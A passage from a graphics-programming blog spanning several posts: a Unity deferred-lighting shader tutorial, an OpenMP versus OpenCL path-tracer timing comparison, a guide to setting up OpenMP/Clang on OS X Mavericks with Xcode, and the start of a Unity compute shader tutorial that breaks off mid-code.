<p>“x is 1.0 (or –1.0 if currently rendering with a flipped projection matrix), y is the camera’s near plane, z is the camera’s far plane and w is 1/FarPlane.”</p>
</blockquote>
<p>So it looks like all that multiplication is doing is making sure that we’re right side up on platforms where rendering to texture flips the image.</p>
<p>I have no idea why we end up adding the halved w component back to our xy components. Again, twitter me if you have any idea.</p>
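<p>For what it’s worth, here is one possible reading of that arithmetic, which I haven’t confirmed against Unity’s source. Visible clip space x and y lie between -w and +w. Halving them and then adding half of w moves them into the range 0 to w, so the divide by w that tex2Dproj performs lands in the 0 to 1 range that texture coordinates use. The sketch below redoes the vert function’s math in plain Python; the function name and the flip parameter (standing in for _ProjectionParams.x) are made up for illustration.</p>

```python
def screen_uv(clip_x, clip_y, clip_w, flip=1.0):
    """Mirror the vert function: halve, flip y, add half w, then divide by w.

    flip stands in for _ProjectionParams.x (1.0, or -1.0 when flipped).
    The final divide is the one tex2Dproj is described as doing.
    """
    half_x, half_y, half_w = clip_x * 0.5, clip_y * 0.5, clip_w * 0.5
    half_y *= flip
    u = (half_x + half_w) / clip_w
    v = (half_y + half_w) / clip_w
    return (u, v)


w = 4.0
print(screen_uv(-w, -w, w))            # (0.0, 0.0)
print(screen_uv(0.0, 0.0, w))          # (0.5, 0.5)
print(screen_uv(w, w, w))              # (1.0, 1.0)
print(screen_uv(w, w, w, flip=-1.0))   # (1.0, 0.0)
```

<p>Seen this way, the halving and the added half w are together just the usual “times 0.5, plus 0.5” remap, applied before the perspective divide instead of after it.</p>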
<p>But now that that’s covered, our fragment function is really straightforward:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">float4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">vOUT</span> <span class="n">i</span><span class="p">)</span> <span class="o">:</span> <span class="n">COLOR</span>
<span class="p">{</span>
<span class="n">float4</span> <span class="n">light</span> <span class="o">=</span> <span class="n">tex2Dproj</span><span class="p">(</span><span class="n">_LightBuffer</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uvProj</span><span class="p">);</span>
<span class="n">float4</span> <span class="n">logLight</span> <span class="o">=</span> <span class="o">-</span><span class="p">(</span><span class="n">log2</span><span class="p">(</span><span class="n">max</span><span class="p">(</span><span class="n">light</span><span class="p">,</span> <span class="n">float4</span><span class="p">(</span><span class="mf">0.001</span><span class="p">,</span><span class="mf">0.001</span><span class="p">,</span><span class="mf">0.001</span><span class="p">,</span><span class="mf">0.001</span><span class="p">))));</span>
<span class="n">float4</span> <span class="n">texCol</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">);</span>
<span class="k">return</span> <span class="nf">float4</span><span class="p">((</span><span class="n">texCol</span><span class="p">.</span><span class="n">xyz</span> <span class="o">*</span> <span class="n">logLight</span><span class="p">.</span><span class="n">xyz</span><span class="p">)</span> <span class="o">+</span> <span class="n">float3</span><span class="p">(</span><span class="n">_SpecColor</span><span class="p">.</span><span class="n">xyz</span><span class="p">)</span> <span class="o">*</span> <span class="n">logLight</span><span class="p">.</span><span class="n">w</span><span class="p">,</span> <span class="n">texCol</span><span class="p">.</span><span class="n">w</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>Notice how, unlike forward rendering, we don’t have to do any per light calculations, because they’ve already been done for us and the results stored in the light buffer. All we have to do is read from that buffer and multiply our fragment colour accordingly. Just like in the first pass, specular values are stored on the alpha channel of the light buffer.</p>
<p>The logLight calculation feels to me like an implementation specific detail that we don’t really need to worry about, except to know that we have to do it to get values that make sense from Unity. I haven’t built any deferred lighting systems from scratch, so I’m not sure if this is a standard way of storing data in a light buffer or not.</p>
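<p>To get a feel for what that line does, here is a small sketch in Python. It assumes the buffer holds 2 raised to the power of the negated light value, which is only my guess based on the shape of the decode, not something I’ve seen documented. The encoder below is hypothetical; the decoder mirrors the shader line.</p>

```python
import math


def encode_light(value):
    """Hypothetical encoder: squash a non-negative light value into (0, 1]."""
    return 2.0 ** (-value)


def decode_light(stored):
    """Mirror of the shader line: -log2(max(stored, 0.001))."""
    return -math.log2(max(stored, 0.001))


for light in (0.5, 1.0, 4.0):
    stored = encode_light(light)
    print(light, stored, decode_light(stored))
```

<p>Under that assumption, light values well above 1 still fit in a texture that can only hold 0 to 1, and the max with 0.001 keeps log2 away from zero, which caps the decoded value at a little under 10.</p>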
<p>But nevertheless, you should now have a working pixel shader with deferred lighting. How exciting! Only one pass left to go.</p>
<h2>Pass 3: Casting Shadows</h2>
<p>One of the cooler parts of Deferred Rendering is getting to have point lights cast shadows, but to do that we’ll need another pass.
Luckily, this pass is the same as any other shadow caster pass in Unity. In theory you could let a fallback handle this for you, but for the sake of having a fully standalone shader, let’s add it here as well.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Pass</span> <span class="p">{</span>
<span class="n">Name</span> <span class="s">"ShadowCaster"</span>
<span class="n">Tags</span> <span class="p">{</span> <span class="s">"LightMode"</span> <span class="o">=</span> <span class="s">"ShadowCaster"</span> <span class="p">}</span>
<span class="n">Fog</span> <span class="p">{</span><span class="n">Mode</span> <span class="n">Off</span><span class="p">}</span>
<span class="n">ZWrite</span> <span class="n">On</span> <span class="n">ZTest</span> <span class="n">LEqual</span> <span class="n">Cull</span> <span class="n">Off</span>
<span class="n">Offset</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span>
<span class="n">CGPROGRAM</span>
<span class="cp">#pragma vertex vert
</span> <span class="cp">#pragma fragment frag
</span> <span class="cp">#pragma multi_compile_shadowcaster
</span> <span class="cp">#include "UnityCG.cginc"
</span>
<span class="k">struct</span> <span class="nc">v2f</span> <span class="p">{</span>
<span class="n">V2F_SHADOW_CASTER</span><span class="p">;</span>
<span class="p">};</span>
<span class="n">v2f</span> <span class="n">vert</span><span class="p">(</span> <span class="n">appdata_base</span> <span class="n">v</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">v2f</span> <span class="n">o</span><span class="p">;</span>
<span class="n">TRANSFER_SHADOW_CASTER</span><span class="p">(</span><span class="n">o</span><span class="p">)</span>
<span class="k">return</span> <span class="n">o</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">float4</span> <span class="n">frag</span><span class="p">(</span> <span class="n">v2f</span> <span class="n">i</span> <span class="p">)</span> <span class="o">:</span> <span class="n">SV_Target</span>
<span class="p">{</span>
<span class="n">SHADOW_CASTER_FRAGMENT</span><span class="p">(</span><span class="n">i</span><span class="p">)</span>
<span class="p">}</span>
<span class="n">ENDCG</span>
<span class="p">}</span> </code></pre></figure>
<h2>Conclusion</h2>
<p>If everything has gone according to plan, you should now have a pixel shader that works with deferred lighting and shadows! If you don’t see your object at all, make sure that you’ve actually switched your camera over to the deferred path (I made that mistake when writing this post).</p>
<p>It’s worth noting that all I did to figure this out was to write surface shaders that only used the deferred lighting path, have them compile down to glsl and figure out what was going on from the compiled shaders.</p>
<p>If you want to learn more (like how to add spherical harmonic lights, or use lightmaps), you can do the same thing yourself: add “exclude_path:forward” to your surface pragma, and add an additional pragma below that, like this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="cp">#pragma surface surf BlinnPhong exclude_path:forward
#pragma only_renderers gles</span></code></pre></figure>
<p>If you’re on desktop, you’ll need to click the “Show All” button in the inspector to get at the gles code, since gles shaders are meant for mobile devices. If you can read ARB or DirectX assembly, you can do that too, but I find glsl much more readable.</p>
<div align="center">
<img src="/images/post_images/2015-01-03/shader_inspector.png" />
<font size="2">notice the "Show All" button</font>
<br />
<br />
</div>
<p>If you have any questions about anything, spot a mistake, or just want to say hi, send me a message <a href="http://twitter.com/khalladay">on twitter</a>. Happy Shading!</p>
OpenMP vs OpenCL - An Unfair Comparison2014-10-25T00:00:00+00:00http://kylehalladay.com/all/blog/2014/10/25/OpenMP vs OpenCL<p>In the wake of my last post, I decided to get started with my path tracing project by building a small proof of concept renderer to get my feet wet both with the path tracing algorithm and with OpenMP. I was pretty happy with the output of the path tracer (shown below), but I wasn’t happy with the speed I was getting. Since this project’s entire goal is to entertain me, having to wait minutes to see how a code change impacts the output image is a major buzzkill.</p>
<div align="center">
<img src="/images/post_images/2014-10-26/caffeine-4096.png" style="max-width:100%;" />
<br />
<br />
<br />
</div>
<p>So I decided to ask (myself) a really stupid question: would this be faster on the GPU?</p>
<p>And because the answer for that was pretty obvious (yes!), I then asked a slightly less stupid question: how much faster?</p>
<p>To answer that, I wrote a second version of the path tracer using OpenCL and ran both of them with the time command. It goes without saying that the code bases were so different that this comparison isn’t exactly fair, but I’ve always wanted to put a graph in a blog post, so here one is!</p>
<div align="center">
<img src="/images/post_images/2014-10-26/clvsmp.png" style="max-width:100%;" />
<br />
<br />
<br />
</div>
<p>It’s hard to see on the graph, but the OpenCL renderer only barely cracked a minute in running time on the 1024 samples per pixel run. OpenMP started at a minute and a half for the 64 samples per pixel case. There are obviously other things that impact which API will be the best for your use case, but iteration speed is pretty important to me, and it’s how I’m deciding which API I’m using for this project. Waiting makes you a waiter.</p>
<p>If you’re interested, the code for both path tracers can be found on github: <a href="https://github.com/khalladay/CaribouPT">OpenMP</a> or <a href="https://github.com/khalladay/CaffeinePT">OpenCL</a>. If you can see anything in the OpenMP source that could be changed to make it 20x faster (which would <em>almost</em> catch up to OpenCL), please let me know! Until then, it looks like I’m abandoning OpenMP for this project.</p>
<p>As always, I’m <a href="http://twitter.com/khalladay">on twitter</a> if you want to say hi :D Happy Coding!</p>
Setting Up OpenMP on Mavericks2014-07-15T00:00:00+00:00http://kylehalladay.com/all/blog/2014/07/15/Setting-Up-OpenMP-Mavericks<div style="background-color:#EEAAAA;">NOTE: This article is from 2014 and will not be updated. It may or may not still be valid
</div>
<p>If you’ve ever worked with me (or talked with me for more than a half hour) it’s not a secret that I’m completely fascinated with ray and path tracers. My last project was building a <a href="https://github.com/khalladay/xRay">relatively simple ray tracer</a>, so I think it’s time to build a path tracer.</p>
<div align="center">
<img src="/images/post_images/2014-07-15/xray_output_monkey.png" style="max-width:100%;" />
<br />
<font size="2">The Blender monkey rendered in my first ray tracer</font>
<br />
<br />
</div>
<p>I’ve tinkered with a few open source path tracers out there, but the one that caught my eye originally was <a href="http://www.kevinbeason.com/smallpt/">SmallPT</a>, which uses OpenMP. OpenMP is an API specification, maintained by the OpenMP Architecture Review Board (a consortium that includes Intel), that makes it dead simple to write parallel code. Want to have a for loop distribute itself over multiple cores? That looks like this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="cp">#pragma omp parallel for
</span><span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="mi">100</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Loop executed on thread %d"</span><span class="p">,</span> <span class="n">omp_get_thread_num</span><span class="p">());</span>
<span class="p">}</span></code></pre></figure>
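<p>If you don’t have an OpenMP capable compiler handy yet (see the rest of this post), the general shape of “hand the loop iterations to a pool of workers” can be sketched with Python’s standard library. This is only an analogy, not OpenMP: the pool size of 4 and the function name are arbitrary choices of mine, and in standard CPython threads won’t speed up CPU-bound work the way OpenMP threads do.</p>

```python
from concurrent.futures import ThreadPoolExecutor
import threading


def body(i):
    """One loop iteration; returns the index and the worker that ran it."""
    return i, threading.current_thread().name


# Hand the 100 iterations to a pool of 4 workers (4 is an arbitrary choice).
with ThreadPoolExecutor(max_workers=4) as pool:
    results = list(pool.map(body, range(100)))

workers = sorted({name for _, name in results})
print(len(results), "iterations ran on", workers)
```

<p>The point is just that the loop body stays the same and something else decides which worker runs which iteration, which is the part OpenMP handles for you with a single pragma.</p>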
<p>After working with Boost’s Thread library on the ray tracer, which ended up dictating a lot of the structure of the renderer, OpenMP seems like a great way to let the compiler/runtime handle the implementation of the threading code and let me focus on actually building something cool.</p>
<p>So with that in mind, today’s article is all about how to set up OpenMP on Mavericks and get it working with a Makefile in Xcode 5; it’s a heck of a lot more involved than I originally anticipated. One caveat of this post is that most of the information here is taken from other places (which I’ve linked to); I’m just collecting it all in one place for the next person who wants to do this.</p>
<h2>Extreme Yak Shaving</h2>
<p>The first step to getting OpenMP up and running on Mavericks is to install a new compiler. No joke. The version of Clang installed on your system doesn’t support OpenMP, and Apple very quietly replaced gcc with a symlink to Clang with Xcode 5, so we’re starting this process up a bit of a creek.</p>
<p>There are 2 commonly recommended options at this point. Probably the most logical solution is to simply install GCC 4.9 using Homebrew or MacPorts (or build it yourself if that turns your crank), but the Homebrew recipe for GCC 4.9 was broken at the time of writing this, and while I was looking for how to grab it from MacPorts I came across <a href="http://clang-omp.github.io">OpenMP®/Clang</a>.</p>
<p>OpenMP®/Clang, unsurprisingly, is a modified version of Clang which supports OpenMP. Given that I’m already used to using Clang this seemed like a great idea, especially since the website is active, and indicates that the plan is to eventually contribute to the Clang trunk. May as well jump on the bandwagon early.</p>
<h2>Installing OpenMP®/Clang</h2>
<p>This part is tricky, but luckily StackOverflow has our back. If you check out <a href="http://stackoverflow.com/a/21789869">this post</a> you can find a script that user Jason Parham wrote for automating the process of installing / configuring the tools we need (namely OpenMP®/Clang, and the OpenMP® runtime itself). I modified the paths that everything got built to, but otherwise the steps I took mimic that script almost exactly.</p>
<p>One thing to pay attention to is that the script above will bind the new version of clang to the commands “clang2” and “clang2++,” which is great because it means we don’t have to screw with the moderately important command currently bound to “clang.”</p>
<p>Aside from that though, that script should take care of a lot of the heavy lifting needed to get us going.</p>
<h2>Clang2 and Xcode</h2>
<p>If you’re happy just using Makefiles by themselves you can actually just stop here and use them to build your projects (remembering to use the -fopenmp flag), but I still wanted to use Xcode as a front end for the LLVM debugger, so my odyssey continued for a bit. If that sounds like something you want too, the rest of this article will outline how to get that working.</p>
<p>Setting up a makefile based project in Xcode is (relatively) straightforward:</p>
<ul>
<li>Create a new project like normal, choosing whatever template makes sense.</li>
<li>Go to your project settings and delete the pre-generated target(s) for your application</li>
<li>Create a new target of type “External Build System”</li>
<li>Create a makefile for your project and put it somewhere in your project directory</li>
<li>In your Build Tool Configuration page, set the directory to wherever you’ve chosen to store your makefile, and set the arguments to “-f NAME_OF_YOUR_MAKEFILE”</li>
</ul>
<p>If you’ve followed those steps, your Build Tool Configuration page should look something like the following:</p>
<div align="center">
<img src="/images/post_images/2014-07-15/build_tool_settings.png" />
<br />
</div>
<p><br /></p>
<p>Great. Next up is to actually write the makefile. For the most part this is the same as any other makefile, except that you need to specify “clang2” as the compiler, and include the -fopenmp flag when you compile files that include OpenMP. A really simple makefile that does this might look like the following:</p>
<div align="center">
<img src="/images/post_images/2014-07-15/makefile.png" />
<br />
</div>
<p><br /></p>
<p>We’re almost there, but Xcode isn’t through with us yet. If you try to build now, you’ll notice that it fails spectacularly and spits out a cryptic error that boils down to not knowing what the heck “clang2” is. This is because for some reason Xcode doesn’t read the PATH variables that we set up in that script earlier, so we need to tell it where to find our compiler.</p>
<p>I’m sure there’s a better way of doing this, but after a couple of hours of banging my head against a wall, I’ve resigned myself to launching Xcode from the command line like so:</p>
<pre><code>$ source ~/.profile
$ open -a "Xcode"
</code></pre>
<p>This will open Xcode with the path variables we need set up properly. If you like Spotlight as much as I do, I recommend wrapping these in an Automator application so you can run these commands from there.</p>
<p>If you build from the Xcode that was opened from the command line, you should finally be able to run your program. If you’re looking for a good test, I recommend the example found on <a href="http://clang-omp.github.io">clang-omp.github.io</a>. If OpenMP is running correctly, you should be able to see the printf statement get executed from multiple threads when that file is run.</p>
<p>Normally this is where I tell you to contact me with any questions, but I fear that I’m as in the dark about this as you are right now, although hopefully that changes over the next few weeks. In any case, you can get a hold of me <a href="http://twitter.com/khalladay">on twitter</a> if you want to say hi. Happy Coding!</p>
Getting Started With Compute Shaders In Unity2014-06-27T00:00:00+00:00http://kylehalladay.com/blog/tutorial/2014/06/27/Compute-Shaders-Are-Nifty<div style="background-color:#EEAAAA;">NOTE: This article is for an old version of Unity (Unity 4...sometime in 2014) and probably won't run anymore, but the basic idea is still valid. I just don't want to spend time updating old posts every time Unity increments a version number
</div>
<p>I love the simplicity of vert/frag shaders; they only do one thing (push verts and colors to the screen), and they do it exceptionally well, but sometimes, that simplicity feels limiting and you find yourself staring at a loop of matrix calculations happening on your CPU trying desperately to figure out how you could store them in a texture…</p>
<p>…Or maybe that’s just me, but regardless, compute shaders solve that problem, and it turns out that they’re dead simple to use, so I’m going to explain the basics of them today. First I’ll go through the example compute shader that Unity auto-creates for you, and then I’ll finish off with an example of a compute shader working with a structured buffer of data.</p>
<div align="center">
<img src="/images/post_images/2014-06-30/particlesystem.png" />
<br />
<font size="2">Compute shaders can be used to control the positions of particles</font>
<br />
</div>
<p><br /></p>
<h2>What the Heck is a Compute Shader?</h2>
<p>Simply put, a compute shader is a program executed on the GPU that doesn’t need to operate on mesh or texture data, works inside the OpenGL or DirectX memory space (unlike OpenCL which has its own memory space), and can output buffers of data or textures and share memory across threads of execution.</p>
<p>Right now Unity only supports DirectX11 compute shaders, but once everyone catches up to OpenGL 4.3, hopefully us mac lovers will get them too :D</p>
<p>This means that this will be my first ever WINDOWS ONLY tutorial. So if you don’t have access to a windows machine, the rest of this probably won’t be helpful.</p>
<h2>What are they good for? (and what do they suck at?)</h2>
<p>Two words: math and parallelization. Any problem which involves applying the same (no conditional branching) set of calculations to every element in a data set is perfect. The larger the set of calculations, the more you’ll reap the rewards of doing things on your GPU.</p>
<p>Conditional branching really kills your performance because GPUs aren’t optimized to do that, but this is no different from writing vertex and fragment shaders so if you have some experience with them this will be old hat.</p>
<p>There’s also the issue of latency. Getting memory from the GPU back to your CPU takes time, and will likely be your bottleneck when working with compute shaders. This can be somewhat mitigated by ensuring that you optimize your kernels to work on the smallest buffers possible but it will never be totally avoided.</p>
<h2>Got it? Good. Let's get started.</h2>
<p>Since we’re working with DirectX, Unity’s compute shaders need to be written in HLSL, but it’s pretty much indistinguishable from the other shader languages so if you can write Cg or GLSL you’ll be fine (this was my first time writing HLSL too).</p>
<p>The first thing you need to do is create a new compute shader. Unity’s project panel already has an option for this, so this step is easy. If you open up that file, you’ll see the following auto generated code (I’ve removed the comments for brevity):</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="cp">#pragma kernel CSMain
</span>
<span class="n">RWTexture2D</span><span class="o"><</span><span class="n">float4</span><span class="o">></span> <span class="n">Result</span><span class="p">;</span>
<span class="p">[</span><span class="n">numthreads</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span><span class="mi">8</span><span class="p">,</span><span class="mi">1</span><span class="p">)]</span>
<span class="kt">void</span> <span class="nf">CSMain</span> <span class="p">(</span><span class="n">uint3</span> <span class="n">id</span> <span class="o">:</span> <span class="n">SV_DispatchThreadID</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">Result</span><span class="p">[</span><span class="n">id</span><span class="p">.</span><span class="n">xy</span><span class="p">]</span> <span class="o">=</span> <span class="n">float4</span><span class="p">(</span><span class="n">id</span><span class="p">.</span><span class="n">x</span> <span class="o">&</span> <span class="n">id</span><span class="p">.</span><span class="n">y</span><span class="p">,</span> <span class="p">(</span><span class="n">id</span><span class="p">.</span><span class="n">x</span> <span class="o">&</span> <span class="mi">15</span><span class="p">)</span><span class="o">/</span><span class="mf">15.0</span><span class="p">,</span> <span class="p">(</span><span class="n">id</span><span class="p">.</span><span class="n">y</span> <span class="o">&</span> <span class="mi">15</span><span class="p">)</span><span class="o">/</span><span class="mf">15.0</span><span class="p">,</span> <span class="mf">0.0</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>This is a really good place to start figuring out compute shaders, so let’s go through it line by line:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="cp">#pragma kernel CSMain</span></code></pre></figure>
<p>This specifies the entry point to the program (essentially the compute shader’s “main”). A single compute shader file can have a number of these functions defined, and you can call whichever one you need from script.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">RWTexture2D</span><span class="o"><</span><span class="n">float4</span><span class="o">></span> <span class="n">Result</span><span class="p">;</span></code></pre></figure>
<p>This declares a variable that contains data the shader program will work with. Since we aren’t working with mesh data, you have to explicitly declare what data your compute shader will read from and write to. The “RW” in front of the datatype specifies that the shader will both read from and write to that variable.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="p">[</span><span class="n">numthreads</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span><span class="mi">8</span><span class="p">,</span><span class="mi">1</span><span class="p">)]</span></code></pre></figure>
<p>This line specifies the dimensions of the thread groups being spawned by our compute shader. Compute shaders take advantage of the GPU’s massively parallel hardware by creating threads that run simultaneously. Thread groups specify how to organize these spawned threads. In the code above, we are specifying that we want each group to contain 64 threads (8 × 8 × 1), which can be accessed like a 2D array.</p>
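<p>The arithmetic behind “64 threads, accessed like a 2D array” is small enough to sketch in Python. The helper names are made up for illustration; the flattening formula is the usual row-major one, which as far as I know is also how HLSL’s SV_GroupIndex is defined.</p>

```python
NUMTHREADS = (8, 8, 1)  # the values from [numthreads(8,8,1)]


def threads_per_group(dims):
    """Total threads in one group: the product of the three dimensions."""
    x, y, z = dims
    return x * y * z


def flat_index(local_id, dims):
    """Flatten an (x, y, z) position inside a group into one index."""
    x, y, z = local_id
    dim_x, dim_y, _ = dims
    return z * dim_x * dim_y + y * dim_x + x


print(threads_per_group(NUMTHREADS))      # 64
print(flat_index((0, 0, 0), NUMTHREADS))  # 0
print(flat_index((7, 7, 0), NUMTHREADS))  # 63
```

<p>Changing the attribute to something like (64,1,1) would give the same number of threads per group, just laid out as a single row instead of an 8 by 8 tile.</p>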
<p>Determining the optimum size of your thread groups is a complicated issue, and is largely related to your target hardware. In general, think of your GPU as a collection of stream processors, each of which is capable of executing X threads simultaneously. Each processor runs 1 thread group at a time, so ideally you want your thread group to contain X threads to take best advantage of the processor. I’m still at the point where I’m playing with these values to really get a handle on them, so rather than dispense advice on how best to set these values, I’ll leave it up to you to google (and then share <a href="http://twitter.com/khalladay">on twitter</a> :D ).</p>
<p>The rest of the shader is pretty much regular code. The kernel function determines what pixel it should be working on based on the id of the thread running the function, and writes some data to the Result buffer. Easy right?</p>
<h2>Actually Running The Shader</h2>
<p>Obviously we can’t attach a compute shader to a mesh and expect it to run, especially since it isn’t working with mesh data. Compute shaders actually need to be set up and called from scripts, which looks like this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">public</span> <span class="n">ComputeShader</span> <span class="n">shader</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">RunShader</span><span class="p">()</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">kernelHandle</span> <span class="o">=</span> <span class="n">shader</span><span class="p">.</span><span class="n">FindKernel</span><span class="p">(</span><span class="s">"CSMain"</span><span class="p">);</span>
<span class="n">RenderTexture</span> <span class="n">tex</span> <span class="o">=</span> <span class="k">new</span> <span class="n">RenderTexture</span><span class="p">(</span><span class="mi">256</span><span class="p">,</span><span class="mi">256</span><span class="p">,</span><span class="mi">24</span><span class="p">);</span>
<span class="n">tex</span><span class="p">.</span><span class="n">enableRandomWrite</span> <span class="o">=</span> <span class="nb">true</span><span class="p">;</span>
<span class="n">tex</span><span class="p">.</span><span class="n">Create</span><span class="p">();</span>
<span class="n">shader</span><span class="p">.</span><span class="n">SetTexture</span><span class="p">(</span><span class="n">kernelHandle</span><span class="p">,</span> <span class="s">"Result"</span><span class="p">,</span> <span class="n">tex</span><span class="p">);</span>
<span class="n">shader</span><span class="p">.</span><span class="n">Dispatch</span><span class="p">(</span><span class="n">kernelHandle</span><span class="p">,</span> <span class="mi">256</span><span class="o">/</span><span class="mi">8</span><span class="p">,</span> <span class="mi">256</span><span class="o">/</span><span class="mi">8</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>There are a few things to note here. First is setting the enableRandomWrite flag of your render texture BEFORE you create it. This gives your compute shaders access to write to the texture. If you don’t set this flag you won’t be able to use the texture as a write target for the shader.</p>
<p>Next we need a way to identify what function we want to call in our compute shader. The FindKernel function takes a string name, which corresponds to one of the kernel names we set up at the beginning of our compute shader. Remember, a Compute Shader can have multiple kernels (functions) in a single file.</p>
<p>The ComputeShader.SetTexture call lets us move the data we want to work with from CPU memory to GPU memory. Moving data between memory spaces is what will introduce latency to your program, and the amount of slowdown you see is proportional to the amount of data that you are transferring. For this reason, if you plan on running a compute shader every frame you’ll need to aggressively optimize how much data is actually getting operated on.</p>
<p>The three integers passed to the Dispatch call specify the number of thread groups we want to spawn. Recall that each thread group’s size is specified in the numthreads block of the compute shader, so in the above example, the number of total threads we’re spawning is as follows:</p>
<div align="center"><i>32*32 thread groups * 64 threads per group = 65536 threads total.</i></div>
<p>This ends up equating to 1 thread per pixel in the render texture, which makes sense given that the kernel function can only operate on 1 pixel per call.</p>
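<p>To sanity check that arithmetic, here’s a rough CPU-side model of the dispatch, written in plain Python rather than Unity code. It assumes each thread’s pixel coordinate is worked out the way HLSL derives SV_DispatchThreadID (group id * group size + thread id within the group); the function and variable names are made up for illustration.</p>

```python
# CPU-side model of Dispatch(kernel, 256/8, 256/8, 1) with [numthreads(8,8,1)].
# This is plain Python, not Unity code; all names here are illustrative.

NUM_THREADS = (8, 8, 1)   # matches [numthreads(8,8,1)] in the shader
TEX_SIZE = (256, 256)     # matches new RenderTexture(256, 256, 24)


def group_count(size, threads_per_group):
    """Thread groups needed to cover `size` items, rounding up."""
    return (size + threads_per_group - 1) // threads_per_group


def simulate_dispatch(groups_x, groups_y, num_threads=NUM_THREADS):
    """Return {(x, y): visits} for every thread a 2D dispatch would launch."""
    visits = {}
    for gy in range(groups_y):
        for gx in range(groups_x):
            for ty in range(num_threads[1]):
                for tx in range(num_threads[0]):
                    # Same formula as SV_DispatchThreadID:
                    # group id * group size + thread id within the group
                    pixel = (gx * num_threads[0] + tx,
                             gy * num_threads[1] + ty)
                    visits[pixel] = visits.get(pixel, 0) + 1
    return visits


groups_x = group_count(TEX_SIZE[0], NUM_THREADS[0])
groups_y = group_count(TEX_SIZE[1], NUM_THREADS[1])
visits = simulate_dispatch(groups_x, groups_y)
total_threads = sum(visits.values())

print(groups_x, groups_y, total_threads)  # 32 32 65536
```

<p>The group_count helper rounds up, which only matters when the texture size isn’t a multiple of the group size: a 250 pixel wide texture would still need 32 groups of 8, and the kernel would then want a bounds check for the threads that fall off the edge.</p>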
<p>So now that we know how to write a compute shader that can operate on texture memory, let’s see what else we can get these things to do.</p>
<div align="center">
<img src="/images/post_images/2014-06-30/gpgpu.jpg" />
<br />
<br />
</div>
<h2>Structured Buffers Are Freaking Sweet</h2>
<p>Modifying texture data is a bit too much like vert/frag shaders for me to get too excited; it’s time to unshackle our GPU and get it working on arbitrary data. Yes it’s possible, and it’s as awesome as it sounds.</p>
<p>A structured buffer is just an array of data consisting of a single data type. You can make a structured buffer of floats, or one of integers, but not one of floats and integers. You declare a structured buffer in a compute shader like this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">StructuredBuffer</span><span class="o"><</span><span class="kt">float</span><span class="o">></span> <span class="n">floatBuffer</span><span class="p">;</span>
<span class="n">RWStructuredBuffer</span><span class="o"><</span><span class="kt">int</span><span class="o">></span> <span class="n">readWriteIntBuffer</span><span class="p">;</span></code></pre></figure>
<p>What makes these buffers more interesting though, is the ability for that data type to be a struct, which is what we’ll do for the second (and last) example in this article.</p>
<p>For our example, we’re going to be passing our compute shader a set of points, each of which has a matrix that we want to transform it by. We could accomplish this with 2 separate buffers (one of Vector3s and one of Matrix4x4s), but it’s easier to conceptualize a point/matrix pair if they’re together in a struct, so let’s do that.</p>
<p>In our C# script, we’ll define the data type as follows:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">struct</span> <span class="nc">VecMatPair</span>
<span class="p">{</span>
<span class="k">public</span> <span class="n">Vector3</span> <span class="n">point</span><span class="p">;</span>
<span class="k">public</span> <span class="n">Matrix4x4</span> <span class="n">matrix</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>We also need to define this data type inside our shader, but HLSL doesn’t have a Matrix4x4 or Vector3 type. However, it does have data types which map to the same memory layout. Our shader might end up looking like this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="cp">#pragma kernel Multiply
</span>
<span class="k">struct</span> <span class="nc">VecMatPair</span>
<span class="p">{</span>
<span class="n">float3</span> <span class="n">pos</span><span class="p">;</span>
<span class="n">float4x4</span> <span class="n">mat</span><span class="p">;</span>
<span class="p">};</span>
<span class="n">RWStructuredBuffer</span><span class="o"><</span><span class="n">VecMatPair</span><span class="o">></span> <span class="n">dataBuffer</span><span class="p">;</span>
<span class="p">[</span><span class="n">numthreads</span><span class="p">(</span><span class="mi">16</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">)]</span>
<span class="kt">void</span> <span class="nf">Multiply</span> <span class="p">(</span><span class="n">uint3</span> <span class="n">id</span> <span class="o">:</span> <span class="n">SV_DispatchThreadID</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">dataBuffer</span><span class="p">[</span><span class="n">id</span><span class="p">.</span><span class="n">x</span><span class="p">].</span><span class="n">pos</span> <span class="o">=</span> <span class="n">mul</span><span class="p">(</span><span class="n">dataBuffer</span><span class="p">[</span><span class="n">id</span><span class="p">.</span><span class="n">x</span><span class="p">].</span><span class="n">mat</span><span class="p">,</span>
